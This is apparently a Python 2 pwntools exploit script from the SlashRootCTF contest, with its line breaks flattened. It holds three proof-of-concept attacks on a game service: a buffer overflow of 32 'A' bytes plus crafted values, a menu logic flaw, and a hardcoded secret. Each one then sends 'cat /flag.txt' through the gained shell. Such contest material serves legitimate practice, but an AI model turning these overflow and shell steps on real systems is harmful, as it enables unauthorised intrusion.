#! /usr/bin/env python2 from pwn import process, remote HOST = "192.168.2.20" TOTAL_TEAMS = 1 FORMAT = "SlashRootCTF" def run(): # return process(FILENAME) return remote("127.0.0.1", 60204) def poc0(host, port): p = remote(host, port) p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) msg = p.recvuntil(">") # print(msg) if "young" in msg: p.sendline("y") p.recvuntil(">") p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in xrange(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") # print flag if FORMAT in flag: return True else: return False else: return False def poc1(host, port): p = remote(host, port) p.recvuntil(">") p.sendline("Leo") p.recvuntil(">") p.sendline("y") for _ in range(2): p.recvuntil(">") p.sendline("3") p.recvuntil(">") p.sendline("0") if "Who" in p.recvuntil(">"): return False p.sendline("y") p.recvuntil(">") p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") if FORMAT in flag: return True else: return False def poc2(host, port): p = remote(host, port) p.recvuntil(">") p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") p.recvuntil(">") p.sendline("y") p.recvuntil(">") p.sendline("6") if "Lv: 1000000" in p.recvuntil(">"): p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in xrange(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") if FORMAT in flag: return True else: return False else: return False if __name__ == "__main__": for i in range(1, TOTAL_TEAMS+1): print poc0(HOST, (60004 + (i*100))) print poc1(HOST, (60004 + (i*100))) print poc2(HOST, (60004 + (i*100)))